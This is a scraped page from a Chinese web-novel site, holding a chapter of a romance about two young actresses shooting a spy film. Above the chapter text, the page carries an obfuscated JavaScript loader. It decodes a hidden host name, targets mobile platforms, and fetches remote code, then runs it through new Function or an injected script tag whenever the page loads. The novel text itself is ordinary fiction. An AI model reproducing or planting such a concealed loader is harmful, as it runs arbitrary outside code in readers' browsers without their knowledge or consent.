98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(71(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

9527和咸柠七好好喝,这俩最近两天都没再发过微博。

低糖海苔酥则点赞了孟璟那张定妆照,还在差不多同一时间发了个新状态妈的,真香。

不过以盛雪对发小的了解,路人甲乙丙怎么想,她根本就不care,她在意的应该只有一个人的想法,她一边往外走,一边给宋若发了条语音若若,抹香鲸的军装照你看到没,撩不撩?我一个直女都快被撩死了啊啊啊你不要误会,我没有别的意思,就表示一下真的很帅啊啊啊啊!

收听完这条微信的宋若,看一眼不远处正接受化妆师补妆的军装鲸,没说什么,默默将手机交还给一旁的苏助理。苏小康疑惑地问了一句若若你怎么脸红了?

这正是第一场舞会的场景,两个人第一次见。

刚刚由于群演打翻了桌上的一瓶红酒,这场得重来一次。她此时穿着无袖的水粉色长旗袍,白得耀眼的手臂不能成其为诱惑,若隐若现才更好,因此裹了浅秋香色的披肩,懒洋洋地搭在臂弯内,垂坠的细流苏拂在她手臂内侧,痒痒的,让她觉得牙酸。听助理这样问,她握了握脸,确实有点烫,摇头有水吗,我喝点水。

这小祖宗难得开口要东西,苏小康满口答应有,赶忙将水壶盖拧开,将水递到自家小艺人手上,来,四十度。

宋若喝完了水,导演让各部门就位,再次喊了a。

这是一场苏卿认识她的戏。

于千万年之中,在时间无涯的荒漠里,没有早一步,也没有晚一步,她遇见了她。

对于苏卿来讲,周遭一切的喧嚣都化为乌有,她耳中只有夏日的蝉鸣,一切显得如此寂静,她想起儿时喝过的那口最甘甜的泉水。她心中玫瑰盛放,腰间悬的却只有枪支,制服的左胸挂着繁复的勋章,她如此大张旗鼓地来到这鲜花着锦的宴会,本意是要闹个底儿掉,不期然遇见了此生的劫难。她毫无预兆地抬手制止身后的人马,搜查暂停,她穿越数百人,走到那被一众男女包围的俏丽女郎跟前,凌厉的眼神渐转温柔,却又很快隐匿在寒冰之中,她对侧边戴眼镜的银行家打了声招呼,微微低头含笑赵先生。

这笑也不带任何温度,承受这个笑的人,仿佛脸上挨了一刀。

她知道赵先生为了缓解她造成的压迫,很快就会祸水东引,把这宴会上所有目光的焦点介绍给她认识。

果不其然,这西装革履的男子朝那美得惊心动魄的女郎一摊手掌,侃侃而谈苏处长,听闻您爱花,今天容我介绍一朵真正的玫瑰给你,这位是白玫瑰小姐。

白,玫,瑰。她眼睛早就定在她身上,眼波流转,红唇微动。

玫瑰朝她伸出手。

苏卿脸上是个淡得接近于无的微笑,她轻轻摘去白手套,呈现给众人的手,漂亮得不似属于军人。

周遭骚动起来。苏卿最是不近人情。肯赏光与你握手就是天大的面子,居然还主动摘手套?果然英雄相惜,美人亦然啊。

她轻轻握住了她娇小的手,彼此的体温交融在一起,手心触到的肌肤,柔滑有如江南冬日的丝绸,苏卿。

岑蕊。

哪个蕊?

寒花开已尽,菊蕊独盈枝。

万国皆戎马,酣歌泪欲垂?

岑蕊点了点头,将手抽了回去。

苏卿勾勾唇角,真是个多心的人。

第86章

宋若和孟璟进组三个月的时候,孟老爷子来探班了。

这部戏按照柴鑫的标准,连路边摆早餐摊的群演都将表演打磨得趋近完美。正因为他的严格,高二下期的期末考试和会考,两个人都是当天早上摸黑乘车回学校参加,当天下午又回来,暑假又热,这戏偏有一大部分是冬日戏份,捂着厚厚的衣服,赶戏赶得,非但没有风花雪月的心情,俩人都狠狠瘦了一圈,孟璟的生日在暑假,也不敢回去给老人看到,只隔三差五视频,两个人说好杀青后好好把对方喂胖,再回去见人。

结果杀青还遥遥无期,先把祖父招来了。

老爷子到达的那天,孟璟在片场赶夜戏,宋若回房间休息了会儿,刚换了个衣服,准备去片场找鲸鱼,在酒店门口遇到了孟卫国。

她吃惊不小,但是很快调整过来,搀扶爷爷的胳膊。

老爷子对身后做个眼色,老杨就从后备箱将带来的大包小包都拿了出来。宋若引他们到楼上的房间。前两天视频时,说了最近鲸鱼的戏都是晚上拍,老人踩这个点来,想必是来看孟璟拍戏,宋若就扶着他,陪他一起去。

走在路上,孟卫国笑着和她说若若,现在我那些战友的小孙子到我们家做客,都问我孟璟姐姐呢,以前他们都怕她,现在入了这一行,倒成了个香饽饽。你知不知道,孟璟小时候有人给她算过命,说她少年成名,大红大紫,但是说到这里,顿住了,又笑起来,我就不信那些怪力乱神的事情。现在看来,还真是这样。

宋若听到了那个欲言又止的但是,心头有点不愉快,不过很快就冲淡了,点头微笑是这样,孟璟一生都会平安顺利。

老人朝她笑笑还要你的照顾才行。

女主角毕竟是女主角。

天赋技能点多而且杂。

她想学习,小半月之内能在分班考试中成为黑马。

她想拍戏,第一部 电影小打小闹只是刷了个脸熟,第二部戏,只是更投入了一点,立刻就爆了。网络上对于她的评价是,可能是唯一一个电影还没出来但是人抢先红了的。从来没有哪个演员的路透片花被转得那么疯狂。起因其实很滑稽,先前那波撕选角的造势后,大某心理学教授,分析sychoath(精神变态)的行为心理成因时,发的微博配图是苏卿舔刀的照片。

照片里孟璟涂着红唇,牙齿雪白,舌尖却沾染一丝血色,相映成趣,妖冶异常。

其实苏卿有两面,但洁白无瑕的那一面却并没有那么让粉丝疯狂。可能最近大家看多了伟光正的角色,偶尔也需要一点调剂。

孟璟赶着拍戏的进度,对这事完全不知情,是孟璟的粉丝上去质疑,教授这个行为侵犯了孟璟的肖像权,让他删除。

孟璟隔天刷微博,收到很多艾特提醒,回了一句话。她是不怎么受倪羽晴控制的,平时发微博转赞评也比较随意,当时就转了那教授的微博,配字我是苏卿,我为sychoath带盐[可爱],她本意是恶搞,没料到粉丝却完全理解成了另一种意思,下边的小可爱一水儿的好豁达!我就知道我没粉错人!哈哈哈仔细一看苏卿是有那么点变态可能是世界上最好看的小变态了吧。

既化解了尴尬,又顺道宣传了一波电影。

在屏幕后边伺机而动的剪刀手们见她这个反应,顿时按捺不住体内的洪荒之力,大刀阔斧地剪辑起来。一时之间各大弹幕网站上传满了苏卿的鬼畜视频。一提到鬼畜或是女特务,下边就有人跟帖想到苏卿,想到苏卿 身份证号!

更进一步就是各种拉娘了,当然最多的还是孟璟和她的短视频。两个人先前就有一部戏在那里,现在又多了这么些素材。市面上流传的已经有多个版本,从青梅x青梅到情敌变情人再到强取豪夺霸道特务爱上我,可以说百花齐放百家争鸣,已经比电影本身还要富于感染力。柴鑫看到这个局面,只觉得喜忧参半,喜的是多了这么多苏卿粉,那给电影省下不知多少宣传费,《谍影》可以说在二次元已经先火起来了,虽然它的初衷和本意并不仅仅止步于百合恋。导演忧虑的地方,就是届时大家伙儿去电影院,只怕有部分年轻观众要把电影当成那满天飞的剪辑视频的同人来看了

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间